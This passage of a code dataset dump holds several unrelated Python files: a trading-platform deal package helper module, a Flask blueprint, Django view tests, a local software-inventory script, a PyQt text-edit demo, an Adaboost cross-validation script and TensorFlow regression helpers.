Commands(self, subject): return {}\n \n def CreateSubject(self, definition, gui, *optArgs):\n subject = None\n try:\n subject = self.CreateFunc(definition, gui, *optArgs)\n except Exception as e:\n acm.LogAll('Could not create subject from definition \"%s\": %s' % (definition, e))\n msg = FormatException(e)\n gui.GenericMessage(msg)\n subject = self.CreateFunc(self.DEFAULT_DEFINITION, gui, *optArgs)\n return subject 
\n\n\nclass DealPackageHelper(HelperInterface):\n CreateFunc = acm.DealPackage.NewAsDecorator\n DEFAULT_DEFINITION = 'Free Form'\n\n def Decorate(self, subject, gui):\n decorator = acm.FBusinessLogicDecorator.WrapObject(UnDecorate(subject), gui)\n return decorator\n\n def Open(self, obj, gui, preserveObject=True):\n obj = UnDecorate( obj ) # to enssure we have the right GUI on the decorator\n fromInsPackage = False\n if obj.IsKindOf(acm.FTrade):\n package = obj.DealPackage()\n elif obj.IsKindOf(acm.FInstrumentPackage):\n package = acm.DealPackage.NewAsDecoratorFromInstrumentPackage(obj, gui)\n fromInsPackage = True\n else:\n package = self.Decorate(obj, gui)\n if not package:\n raise DealPackageException('Could not create deal package from ' + obj.ClassName() + ' ' + str(obj.Originator().StorageId()))\n if not fromInsPackage:\n if not self.Originator(package):\n if preserveObject:\n package = package.Copy()\n else:\n if preserveObject:\n package = package.Edit()\n else:\n package = self.Decorate(package.Originator(), gui).Edit()\n return package\n\n def Save(self, subject, config):\n if config is None:\n config = acm.FDealPackageSaveConfiguration()\n config.DealPackage('Save')\n config.InstrumentPackage('Save')\n self.__Validate(subject, config)\n return subject.Save(config)\n \n def __Validate(self, subject, config):\n aspect = \"DealPackage\"\n if config.DealPackage() == \"Exclude\":\n aspect = \"InstrumentPackage\"\n isValid = subject.IsValid(aspect)\n if not (isinstance(isValid, bool) and isValid == True):\n errorStr = 'Validation Errors:\\n'\n for error in isValid:\n errorStr = errorStr + '- ' + str(error) + '\\n'\n raise DealPackageException(errorStr)\n\n def DefinitionDisplayName(self, subject):\n return str(subject.DefinitionDisplayName())\n\n def MultiTradingEnabled(self, subject):\n return subject.GetAttribute('multiTradingEnabled')\n \n def Name(self, subject):\n return subject.Name()\n \n def ExcludeReference(self, reference):\n excludeRef = reference.IsKindOf(acm.FDealPackageTradeLink) or reference.IsKindOf(acm.FPayment) or reference.IsKindOf(acm.FMatchingTradeLink) or reference.IsKindOf(acm.FTradeAlias) or reference.IsKindOf(acm.FAdditionalInfo)\n return excludeRef\n\n def CheckTradeReferences(self, trade):\n referenced = False\n referencesStr = \"Trade \" + str(trade.OriginalOrSelf().Oid()) + \" cannot be deleted, references exists: \\n\"\n referencesIn = trade.OriginalOrSelf().ReferencesIn()\n if referencesIn.Size():\n for reference in referencesIn:\n if not self.ExcludeReference(reference):\n referencesStr += str(reference.RecordType()) + \" \" + str(reference.Oid()) + \"\\n\"\n referenced = True\n if referenced:\n raise DealPackageException(referencesStr)\n \n def DeleteSubject(self, subject, deleteTrades, trades): \n toOpen = None\n if subject.IsInfant():\n raise DealPackageException('Not possible to delete unsaved dealpackage')\n \n if deleteTrades:\n for trade in trades:\n self.CheckTradeReferences(trade)\n \n if subject.IsKindOf(acm.FDealPackage):\n multiTrading = subject.GetAttribute('multiTradingEnabled')\n original = subject.Original()\n insPackage = original.InstrumentPackage()\n if str(subject.Definition().CustomApplicationName()) == 'FX Option Pricer':\n original = original.Edit()\n original.Delete(True, deleteTrades)\n if not insPackage.IsDeleted() and multiTrading:\n toOpen = insPackage\n else:\n subject.Delete()\n return toOpen\n \n def DeleteTrade(self, subject, trade):\n self.CheckTradeReferences(trade)\n if trade.IsInfant():\n subject.DeleteTrade(trade)\n 
else:\n if not subject.Original():\n raise DealPackageException('Not possible to delete unsaved dealpackage')\n if not trade.Original():\n raise DealPackageException('Not possible to delete unsaved trade')\n original = subject.Original()\n if str(subject.Definition().CustomApplicationName()) == 'FX Option Pricer':\n original = original.Edit()\n if not original.DeleteTrade(trade.Original()):\n raise DealPackageException('Not possible to delete trade')\n\n def Trades(self, subject):\n return subject.Trades()\n \n def IsDeletedMsg(self, subject):\n return \"Deal Package '%s' has been deleted in the database.\" % self.Name(subject)\n \n def Originator(self, subject):\n if subject.Originator().Oid() > 0:\n return subject.Originator()\n elif subject.InstrumentPackage().Originator().Oid() > 0:\n return subject.InstrumentPackage().Originator()\n else:\n return None\n \n def Definition(self, subject):\n return subject.Definition()\n\n\nclass DealHelper(DealPackageHelper):\n CreateFunc = acm.Deal.NewAsDecorator\n DEFAULT_DEFINITION = 'Deal Default'\n\n def Open(self, obj, gui, preserveObject = True):\n obj = UnDecorate( obj ) # to enssure we have the right GUI on the decorator\n if obj.IsKindOf(acm.FTrade) or obj.IsKindOf(acm.FInstrument):\n package = acm.Deal.WrapAsDecorator(obj, gui, self.Definition(obj).Name())\n else:\n definition = self.Definition(obj)\n package = self.Decorate(obj, gui)\n if definition.BaseConfiguration().Name() == acm.FSymbol('FX Cash') or not self.Originator(package):\n if preserveObject:\n package = package.Copy()\n else:\n if preserveObject:\n package = package.Edit()\n else:\n package = acm.Deal.WrapAsDecorator(self.Originator(obj), gui, definition.Name()) \n if not package:\n raise DealPackageException('Could not create deal from ' + obj.ClassName() + ' ' + str(obj.Originator().StorageId()))\n return package\n \n def IsDeletedMsg(self, subject):\n return \"Instrument/Trade %s has been deleted in the database.\" % subject.Name()\n \n def Originator(self, subject):\n return self._OriginatorInsOrTrd(subject)\n \n def _OriginatorInsOrTrd(self, subject):\n instrumentOrTrade = None\n trade = self._Trade(subject)\n instrument = self._Instrument(subject)\n if trade and trade.Originator().Oid() > 0:\n instrumentOrTrade = trade.Originator()\n elif instrument and instrument.Originator().Oid() > 0:\n instrumentOrTrade = instrument.Originator()\n return instrumentOrTrade\n \n def _Trade(self, subject):\n return subject.Trades().First()\n \n def _Instrument(self, subject):\n return subject.Instruments().First()\n\n def Definition(self, subject):\n return acm.DealCapturing.CustomInstrumentDefinition(subject)\n \n def Commands(self, subject):\n return {'switchLegs':SwitchLegsCommand(dealPackage=subject)}\n \n def DeleteSubject(self, subject, deleteTrades, trades):\n trade = self._Trade(subject)\n ins = self._Instrument(subject) \n toOpen = None\n if trade.IsInfant() and ins.IsInfant():\n raise DealPackageException('Not possible to delete unsaved trade/instrument.')\n if trade.IsInfant():\n ins.Delete()\n else:\n self.CheckTradeReferences(trade)\n subject.Delete(True, True)\n if not ins.Originator().IsDeleted() and subject.GetAttribute('multiTradingEnabled'):\n toOpen = ins.Originator()\n return toOpen\n\n\nclass EditableObjectHelper(HelperInterface):\n CreateFunc = acm.EditableObject.New\n DEFAULT_DEFINITION = 'Default'\n\n def Decorate(self, subject, gui):\n definitionName = subject.DefinitionName()\n subject = UnDecorate(subject.Object())\n return 
acm.EditableObject().Wrap(definitionName, subject, gui)\n \n def CreateSubjectFromObject(self, obj, gui):\n return self.Decorate(UnDecorate(obj), gui)\n\n def Open(self, subjectToOpen, gui, perserveObject = True):\n subject = None\n if subjectToOpen.IsKindOf(acm.FEditableObject):\n editObject = subjectToOpen.Object()\n if editObject and editObject.StorageId() > 0:\n subjectToOpen = editObject\n else:\n subject = subjectToOpen\n if not subject:\n subjectToOpen = UnDecorate(subjectToOpen)\n definition = acm.EditableObjectDefinition.DefinitionFromClass(subjectToOpen.Class())\n subject = acm.EditableObject().Wrap(definition.Name(), subjectToOpen, gui)\n return subject\n\n def Save(self, subject, config):\n if config and config.DealPackage() == \"SaveNew\":\n return subject.SaveNew()\n else:\n return subject.Save()\n\n def DefinitionDisplayName(self, subject):\n return subject.DefinitionDisplayName()\n\n def MultiTradingEnabled(self, subject):\n return False\n \n def Name(self, subject): \n return subject.Object().Name()\n\n def DeleteSubject(self, subject, deleteTrades, trades):\n if subject.Object().IsInfant():\n raise DealPackageException('Not possible to delete unsaved editable object')\n else:\n subject.Object().Original().Delete()\n \n def Trades(self, subject):\n return []\n \n def Originator(self, subject):\n if subject.IsKindOf(acm.FEditableObject):\n subject = subject.Object()\n if subject.Originator().Oid() > 0:\n return subject.Originator()\n else:\n return None\n\n def IsDeletedMsg(self, subject):\n return \"Object has been deleted in the database.\"\n\n def Definition(self, subject):\n return acm.EditableObjectDefinition.DefinitionFromClass(UnDecorate(subject.Object()).Class())\n\ndef CreateControlCallback(delegate):\n\n def ParseControlTokenCallback(delegate, entry, xArg):\n try:\n if entry == 'fill':\n delegate.HandleFill(xArg)\n elif entry[0:6] == 'space(':\n size = int(entry.split('(')[1].split(')')[0].strip())\n delegate.HandleSpace(xArg, size)\n elif ')' in entry or ']' in entry or '}' in entry:\n delegate.HandleEndBox(xArg)\n else:\n traitName = entry\n extraArg = None\n if '(' in entry:\n raise Exception(\"'(' is not a valid delimiter for custom boxes.\")\n elif '{' in entry:\n traitName = entry.split('{')[0]\n extraArg = '{'\n elif '[' in entry:\n traitName = entry.split('[')[0]\n extraArg = '['\n delegate.HandleControl(xArg, traitName, extraArg)\n except Exception as e:\n msg = \"Failed to parse layout, name '%s' not recognized: '%s'\" % (entry, e)\n raise DealPackageException(msg)\n\n # Bind delegate to callback signature\n import functools\n partial = functools.partial(ParseControlTokenCallback, delegate)\n \n # Wrap in lambda since ACM does not understand partial functions\n return lambda *args, **kwargs: partial(*args, **kwargs)\n\nDEBUG = False\n\ndef Log(txt):\n if DEBUG:\n acm.Log(txt)\n\nclass ListAttributeWrapper(object):\n ''' Simplified access to column names, method chains, formatters etc '''\n\n def __init__(self, dealPackage, traitName):\n self._traitName = traitName\n self._dealPackage = dealPackage\n self._listColumnInfo = acm.FArray()\n self.CreateColumns()\n self._addNewItemRule = self.GetTraitMetaData('addNewItem')()\n\n def TraitName(self):\n return self._traitName\n\n def GetTraitMetaData(self, metaKey):\n return self._dealPackage.GetAttributeMetaData(self.TraitName(), metaKey)\n\n def AddNewItemLast(self):\n return 'Last' in self._addNewItemRule\n\n def ResortListOnChanged(self):\n return 'Sorted' in self._addNewItemRule\n\n def 
GetClassUiProperties(self):\n uiProperties = None\n try:\n domain = self.GetTraitMetaData('elementDomain')()\n uiProperties = 'Name' if domain == acm.FString else domain.UiProperties()\n if not uiProperties:\n uiProperties = 'Name'\n except Exception as e:\n msg = 'GetClassUiProperties failed: ' + str(e)\n Log(msg)\n return uiProperties\n\n def GetNameFromColumn(self, aClass, methodChain):\n colName = None\n colDef = acm.GetDefaultContext().GetExtension(acm.FColumnDefinition, aClass, methodChain)\n if colDef:\n colName = colDef.Value().At('ColumnName', None)\n return colName\n \n def GetNameFromMethod(self, aClass, methodChain):\n return acm.PropertyBinder().DisplayName(aClass, methodChain)\n \n def GetColumnName(self, domain, methodChain):\n columnName = self.GetNameFromColumn(domain, methodChain)\n if columnName is None:\n columnName = self.GetNameFromMethod(domain, methodChain)\n if columnName is None:\n columnName = methodChain\n return columnName\n\n def GetColumnFormatter(self, domain, methodChain):\n formatter = acm.PropertyBinder().FindFormatter(domain, methodChain, None)\n if not formatter:\n formatter = domain.DefaultFormatter() if domain else None\n return formatter\n\n def CreateColumnsFromUiProperties(self):\n try:\n domain = self.GetTraitMetaData('elementDomain')()\n for methodChain in self.GetClassUiProperties().split(' '):\n if methodChain:\n columnName = self.GetColumnName(domain, methodChain)\n formatter = self.GetColumnFormatter(domain, methodChain)\n self._listColumnInfo.Add((methodChain, columnName, formatter))\n except Exception as e:\n msg = 'CreateColumnsFromUiProperties failed: ' + str(e)\n Log(msg)\n return self._listColumnInfo\n\n def CreateArrayFromMetaDataDict(self, columns):\n try:\n for column in columns:\n columnName = column.get('label')\n methodChain = column.get('methodChain')\n formatter = column.get('formatter')\n if formatter:\n getStr = 'formats/' + formatter\n formatter = acm.Get(getStr)\n else:\n domain = self.GetTraitMetaData('elementDomain')()\n formatter = acm.PropertyBinder().FindFormatter(domain, methodChain, None)\n self._listColumnInfo.Add((methodChain, columnName, formatter))\n except Exception as e:\n msg = 'CreateArrayFromMetaDataDict failed: ' + str(e)\n Log(msg)\n return self._listColumnInfo\n\n def CreateColumns(self):\n columns = self.GetTraitMetaData(\"columns\")()\n if columns:\n columns = self.CreateArrayFromMetaDataDict(columns)\n if not columns:\n columns = self.CreateColumnsFromUiProperties()\n return columns\n\n def GetColumns(self):\n return self._listColumnInfo\n \n def GetColumnNames(self):\n return [columnName for _, columnName, _ in self.GetColumns()]\n \n def IsFObject(self, obj):\n return hasattr(obj, 'StringKey')\n\n def GetMethodValue(self, obj, methodChain):\n for method in methodChain.split('.'):\n if method:\n obj = getattr(obj, method)()\n return obj\n\n def GetValueFromMethod(self, obj, methodChain):\n try:\n if self.IsFObject(obj) and methodChain:\n obj = self.GetMethodValue(obj, methodChain)\n except Exception as e:\n msg = 'GetValueFromMethod failed: ' + str(e)\n Log(msg) \n \n return obj\n\n def GetFormattedValueFromMethod(self, val, column):\n methodChain = column.At(0)\n formatter = column.At(2)\n val = self.GetValueFromMethod(val, methodChain)\n if formatter:\n val = formatter.Format(val)\n else:\n if self.IsFObject(val):\n if hasattr(val, 'Name'):\n val = val.Name()\n elif hasattr(val, 'StringKey'):\n val = val.StringKey()\n else:\n val = str(val)\n return val\n \n def GetIconFromObject(self, obj):\n icon = 
None\n if self.IsFObject(obj):\n icon = obj.Icon()\n return icon\n","sub_path":"Extensions/Deal Package/FPythonCode/UxHelpers.py","file_name":"UxHelpers.py","file_ext":"py","file_size_in_byte":18675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"260092219","text":"\n\n\nclass entreprise(object):\n\n def __init__(self):\n self.bankrupt = False\n\n def open_branch(self):\n self.bankrupt = True\n if not self.bankrupt:\n print(\"Branch opened !\")\n\n\ntest = entreprise()\n\nprint(test.bankrupt)\n\nprint(entreprise().bankrupt)\n\ntest2 = entreprise()\ntest2.bankrupt = True\n\n#test.open_branch()\nprint(test.open_branch())\nprint(test2.bankrupt)\n","sub_path":"learning/self.py","file_name":"self.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"562134832","text":"from flask import Blueprint, render_template\nfrom service.auth import current_user\nimport requests\nimport json\n\nfrom service.constants import STORIES_SERVICE_IP, STORIES_SERVICE_PORT\n\n\nhome = Blueprint('home', __name__)\n\n\ndef _strava_auth_url(config):\n return '127.0.0.1:5000'\n\n\n@home.route('/')\ndef index():\n if current_user is not None and hasattr(current_user, 'id'):\n stories = get_story_by_author_id(current_user.id)\n else:\n stories = []\n return render_template(\"index.html\", stories=stories, active_button=\"index\")\n\n\n\ndef get_story_by_author_id(author_id):\n url = 'http://' + STORIES_SERVICE_IP + ':' + STORIES_SERVICE_PORT + '/story_list/' + str(author_id)\n try:\n reply = requests.get(url, timeout=1)\n story = json.loads(reply.text)\n if story[\"result\"] == 1:\n return story[\"story\"]\n else:\n return []\n except:\n return []\n\n","sub_path":"service/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"344985891","text":"from ..test_base import *\nfrom django.urls import resolve\nfrom application.presentation.insurance_cover.views.summary import *\nfrom application.tests.test_utils import get_signed_cookie_mock, get_session_user_mock\nfrom nanny.middleware import CustomAuthenticationHandler\n\nclass CustomResponse:\n record = None\n\n def __init__(self, record):\n self.record = record\n\n\ndef authenticate(application_id, *args, **kwargs):\n record = {\n 'application_id': application_id,\n 'email': 'test@informed.com'\n }\n return CustomResponse(record)\n\n\n@mock.patch.object(IdentityGatewayActions, \"read\", authenticate)\n@mock.patch.object(CustomAuthenticationHandler, \"get_signed_cookie\", get_signed_cookie_mock)\n@mock.patch.object(CustomAuthenticationHandler, \"get_session_user\", get_session_user_mock)\nclass SummaryTests(InsuranceCoverTests):\n\n def test_summary_url_resolves_to_page(self):\n \"\"\"\n Test to assert that the url for the 'summary' page can be resolved.\n \"\"\"\n found = resolve(reverse('insurance:Summary'))\n self.assertEqual(found.func.__name__, SummaryView.__name__)\n\n def test_can_render_summary_page(self):\n \"\"\"\n Test to assert that the summary page can be rendered\n \"\"\"\n with mock.patch.object(NannyGatewayActions, 'read') as nanny_api_get, \\\n mock.patch.object(NannyGatewayActions, 'list'):\n response = self.client.get(build_url('insurance:Summary', get={\n 'id': self.application_id\n }))\n\n self.assertEqual(response.status_code, 200)\n\n def test_can_post_to_summary_page(self):\n \"\"\"\n 
Test to assert that the summary page can be rendered\n \"\"\"\n with mock.patch.object(NannyGatewayActions, 'read') as nanny_api_get_app, \\\n mock.patch.object(NannyGatewayActions, 'put') as nanny_api_put_app:\n\n nanny_api_get_app.return_value.status_code = 200\n nanny_api_get_app.return_value.record = self.sample_app\n response = self.client.post(build_url('insurance:Summary', get={\n 'id': self.application_id\n }))\n\n self.assertEqual(response.status_code, 302)\n self.assertTrue('task-list' in response.url)\n","sub_path":"application/tests/test_insurance_cover/test_views/test_summary.py","file_name":"test_summary.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"158146008","text":"# -*- coding: utf-8 -*-\n\n\nimport commands\nimport re\nfrom shell_utils import executeCmdByShell,ExecuteException\nimport json\nimport io\nfrom log import CmdbLog\n\ndef get_user(path):\n cmd = 'ls -l %s' % path\n try:\n code, output = executeCmdByShell(cmd, raise_non_zero_exception=True)\n\n except ExecuteException as e:\n\n msg = e.message\n CmdbLog.add_debug(msg)\n return \"\",\"\"\n else:\n for item in output.splitlines():\n if 'total' not in item.lower():\n return item.split()[2], item.split()[3]\n return \"\", \"\"\n\n\n\n# def get_group(path):\n# cmd = 'ls -l %s' % path\n# try:\n# code, output = executeCmdByShell(cmd, raise_non_zero_exception=True)\n#\n# except ExecuteException as e:\n#\n# msg = e.message\n# CmdbLog.add_debug(msg)\n# return \"\",\"\"\n# else:\n# return output.splitlines()[-1].split()[3]\n\n\ndef getSoftwareLis(host_ip):\n # try:\n # with io.open('software.json', 'rb') as file:\n # filejson = json.load(file)\n #\n # except IOError:\n # print(\"ERROR,file not found!\")\n # else:\n filejson = [{\"softwareName\":\"Kafka\",\"softwareType\":\"ApplicationSystem\",\"existCmd\":\"ps -ef|grep kafkaServer\",\"exitKeyword\":\"kafka-clients\",\"installCmd\":\"ps -ef|grep kafka\",\"regex\":\"-Xloggc:(\\\\S+)/bin\"},\n\t{\"softwareName\":\"Mongodb\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep mongodb\",\"exitKeyword\":\"/bin/mongod\",\"installCmd\":\"ps -ef|grep mongodb\",\"regex\":\"(\\\\S+)/bin\"},\n\t{\"softwareName\":\"Mysql\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep mysqld\",\"exitKeyword\":\"/bin\",\"installCmd\":\"ps -ef|grep mysqld|grep basedir\",\"regex\":\"--basedir=(\\S+)\"},\n\t{\"softwareName\":\"Tomcat\",\"softwareType\":\"MiddleWare\",\"existCmd\":\"ps -ef|grep catalina\",\"exitKeyword\":\"catalina.home=\",\"installCmd\":\"ps -ef|grep tomcat\",\"regex\":\"-Dcatalina\\\\.home=(\\\\S+)\"},\n\t{\"softwareName\":\"Zookeeper\",\"softwareType\":\"ApplicationSystem\",\"existCmd\":\"ps -ef|grep Dzookeeper\",\"exitKeyword\":\"/bin\",\"installCmd\":\"ps -ef|grep zookeeper\",\"regex\":\"(\\\\S+)/bin/../conf/zoo.cfg\"},\n\t{\"softwareName\":\"Nginx\",\"softwareType\":\"MiddleWare\",\"existCmd\":\"ps -ef|grep nginx\",\"exitKeyword\":\"sbin/nginx\",\"installCmd\":\"ps -ef|grep nginx\",\"regex\":\"(\\\\S+)/sbin/nginx\"},\n\t{\"softwareName\":\"Redis\",\"softwareType\":\"DataBase\",\"existCmd\":\"ps -ef|grep redis\",\"exitKeyword\":\"redis-server\",\"installCmd\":\"ps -ef|grep redis\",\"regex\":\"(\\\\S+)/bin/redis-server\"},\n\t{\"softwareName\":\"Jboss\",\"softwareType\":\"MiddleWare\",\"existCmd\":\" ps -ef|grep jboss\",\"exitKeyword\":\"-Djboss\",\"installCmd\":\"ps -ef|grep jboss\",\"regex\":\"-Djboss.home.dir=(\\\\S+)\"}\n]\n softwareVec = []\n for item in 
filejson:\n state, result = commands.getstatusoutput(item['existCmd'])\n if item['exitKeyword'] in result:\n #print(item['exitKeyword'])\n state1, result1 = commands.getstatusoutput(item['installCmd'])\n search = re.search(item['regex'], result1)\n if search:\n path = search.group(1)\n dic =dict()\n dic['software_name'] = item['softwareName']\n dic['software_type'] = item['softwareType']\n dic['install_path'] = path\n dic['user'],dic['group'] = get_user(path)\n #dic['group'] = get_user(path)[1]\n dic['soft_hostIP'] = host_ip\n softwareVec.append(dic)\n else:\n continue\n return softwareVec\n #output['CIT_AppSoft'] = softwareVec\n\n\nclass Software:\n def __init__(self, host_ip):\n self.soft_hostIP = host_ip # By which ip you access to this host;\n self.software_name = \"\"\n self.software_type = \"\"\n self.install_path = \"\"\n self.user = \"\"\n self.group = \"\"\n\n def to_dict(self):\n return self.__dict__\n\n def get_install_path_oracle(self):\n state, result =executeCmdByShell(\"ps -ef|grep oracle|grep tnslsnr\")\n if \"sh\" in result:\n res1=result.split('\\n')[0]\n if \"sh\" in res1:\n result=result.split('\\n')[1]\n else:\n result=result.split('\\n')[0]\n vecs=result.split()\n for vec in vecs:\n if \"/\" in vec:\n result=vec\n break\n\n b = result.find('bin')\n c = result[:b]\n return c\n\n","sub_path":"zhujiziyuan/CMDB_UNIX/Software_module.py","file_name":"Software_module.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"246861573","text":"\nimport sys\nimport os\n\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTextEdit, QGridLayout\n\n\nclass Window(QWidget):\n \n def __init__(self):\n \n super().__init__()\n self.initUi()\n \n self.show()\n \n \n def initUi(self):\n\n layout = QGridLayout() \n text_edit = QTextEdit()\n\n html = '''\n
<p style=\"color: red\">This line is red</p>\n<p style=\"font-size: 14px\">This line is 14px</p>\n<p style=\"font-weight: bold\">This line is bold</p>\n\n<table border=\"1\">\n <tr>\n <th>Month</th>\n <th>Savings</th>\n </tr>\n <tr>\n <td>January</td>\n <td>$100</td>\n </tr>\n <tr>\n <td>February</td>\n <td>$80</td>\n </tr>\n</table>
\n'''\n\n text_edit.setHtml(html)\n\n layout.addWidget(text_edit, 0, 0)\n self.setLayout(layout)\n\n\n\ndef main(args):\n \n app = QApplication(args)\n window = Window()\n sys.exit(app.exec_())\n \n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"PyQt5-Examples/07_input_widgets/text_edit.py","file_name":"text_edit.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"300005745","text":"from __future__ import print_function\nimport sys\n\nimport numpy as np\n\nfrom models.DecisionTree import DecisionTree\nfrom models.Adaboost import Adaboost\nimport io.importer as importer\n\n# preprocessing to construct folding of dataset\ndef construct_k_folds(data, folds=10):\n\n num_rows = data.shape[0]\n fold_length = int(num_rows/folds)\n fold_list = []\n for i in range(folds):\n fold_list.append(data[np.random.choice(num_rows, fold_length, replace=False),:])\n return fold_list\n\n\ndef myABoost(filename, B, k):\n\n filename = str(filename)\n B = B.split(',')\n for b in range(len(B)):\n B[b] = int(B[b])\n k = int(k)\n\n datas = importer.load_and_classify(loc=filename)\n\n # iterate through datasets (Boston50 and Boston75)\n for d in range(len(datas)):\n data = datas[d]\n if d == 0:\n data_name = \"Boston50\"\n else:\n data_name = \"Boston75\"\n fold_list = construct_k_folds(data, folds=k)\n\n # iterate through folds and keep track of errors\n error_matrix = np.zeros(shape=(2*k+4,len(B)))\n\n # iterate through the possible cases of base classifier size\n for b in range(len(B)):\n total_test_error = 0.0\n total_train_error = 0.0\n # construct folded dataset\n for i in range(0,2*len(fold_list), 2):\n test = fold_list[i/2]\n X = np.empty(shape=((k-1)*test.shape[0], test.shape[1]))\n x_row = 0\n for j in range(len(fold_list)):\n if j == i/2:\n continue\n else:\n num_rows = fold_list[j].shape[0]\n X[x_row:x_row + num_rows,:] = fold_list[j]\n x_row = x_row + num_rows\n\n # create new Adaboost object that tracks weak learners and their alphas\n # and computes weight distribution from error calculation\n AB = Adaboost(X, B[b])\n weights = AB.weights\n # create B[b] weak learners and add them to the model, training on\n # previous weak learner's derived weight update\n for t in range(B[b]):\n DT = DecisionTree()\n dt = DT.compute_weighted_subtree(X, w=weights)\n weights = AB.add_model(dt)\n\n # consensus vote given B[b] weak learners on the dataset fold for the training set\n x_hat = AB.vote(X)\n # consensus vote given B[b] weak learners on the dataset fold for the test set\n y_hat = AB.vote(test)\n # compute means\n test_error = float(np.sum(np.absolute(y_hat - test[:, test.shape[1]-1])))/float(test.shape[0])\n train_error = float(np.sum(np.absolute(x_hat - X[:,X.shape[1]-1])))/float(X.shape[0])\n error_matrix[i,b] = train_error\n error_matrix[i+1,b] = test_error\n\n print(\"Adaboost Results for B = \" + str(B[b]))\n print(\"TRAIN ERROR: \", train_error)\n print(\"TEST ERROR: \", test_error)\n\n total_test_error = total_test_error + test_error\n total_train_error = total_train_error + train_error\n\n print(data_name)\n print(\"Total Test Error: \", total_test_error/float(k))\n print(\"Total Train Error: \", total_train_error/float(k))\n\n # find standard deviation and mean, add to calculated matrix\n for c in range(error_matrix.shape[1]):\n test = np.empty(shape=(k))\n train = np.empty(shape=(k))\n for r in range(error_matrix.shape[0]-4):\n if r % 2 == 0:\n train[r/2] = error_matrix[r,c]\n else:\n 
test[(r-1)/2] = error_matrix[r,c]\n error_matrix[error_matrix.shape[0]-4, c] = np.mean(train)\n error_matrix[error_matrix.shape[0]-3, c] = np.std(train)\n error_matrix[error_matrix.shape[0]-2, c] = np.mean(test)\n error_matrix[error_matrix.shape[0]-1, c] = np.std(test)\n\n np.savetxt(\"./data/processed/adaboost_error_matrix_\"+data_name+\".csv\",error_matrix, delimiter=',')\n\n\n\nif __name__ == \"__main__\":\n myABoost(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"HW3/csci5525hw3/myABoost.py","file_name":"myABoost.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"593668807","text":"# Copyright 2016 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Various high level TF models.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport functools\n\nfrom tensorflow.contrib import rnn as contrib_rnn\nfrom tensorflow.contrib.learn.python.learn.ops import losses_ops\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops as array_ops_\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import variable_scope as vs\nfrom tensorflow.python.summary import summary\n\n\ndef linear_regression_zero_init(x, y):\n \"\"\"Linear regression subgraph with zero-value initial weights and bias.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n\n Returns:\n Predictions and loss tensors.\n \"\"\"\n return linear_regression(x, y, init_mean=0.0, init_stddev=0.0)\n\n\ndef logistic_regression_zero_init(x, y):\n \"\"\"Logistic regression subgraph with zero-value initial weights and bias.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n\n Returns:\n Predictions and loss tensors.\n \"\"\"\n return logistic_regression(x, y, init_mean=0.0, init_stddev=0.0)\n\n\ndef linear_regression(x, y, init_mean=None, init_stddev=1.0):\n \"\"\"Creates linear regression TensorFlow subgraph.\n\n Args:\n x: tensor or placeholder for input features.\n y: tensor or placeholder for labels.\n init_mean: the mean value to use for initialization.\n init_stddev: the standard devation to use for initialization.\n\n Returns:\n Predictions and loss tensors.\n\n Side effects:\n The variables linear_regression.weights and linear_regression.bias are\n initialized as follows. If init_mean is not None, then initialization\n will be done using a random normal initializer with the given init_mean\n and init_stddv. (These may be set to 0.0 each if a zero initialization\n is desirable for convex use cases.) 
If init_mean is None, then the\n uniform_unit_scaling_initialzer will be used.\n \"\"\"\n with vs.variable_scope('linear_regression'):\n scope_name = vs.get_variable_scope().name\n summary.histogram('%s.x' % scope_name, x)\n summary.histogram('%s.y' % scope_name, y)\n dtype = x.dtype.base_dtype\n y_shape = y.get_shape()\n if len(y_shape) == 1:\n output_shape = 1\n else:\n output_shape = y_shape[1]\n # Set up the requested initialization.\n if init_mean is None:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], output_shape], dtype=dtype)\n bias = vs.get_variable('bias', [output_shape], dtype=dtype)\n else:\n weights = vs.get_variable(\n 'weights', [x.get_shape()[1], output_shape],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n bias = vs.get_variable(\n 'bias', [output_shape],\n initializer=init_ops.random_normal_initializer(\n init_mean, init_stddev, dtype=dtype),\n dtype=dtype)\n summary.histogram('%s.weights' % scope_name, weights)\n summary.histogram('%s.bias' % scope_name, bias)\n return losses_ops.mean_squared_error_regressor(x, y, weights, bias)\n\n\ndef logistic_regression(x,\n y,\n class_weight=None,\n init_mean=None,\n init_stddev=1.0):\n \"\"\"Creates logistic regression TensorFlow 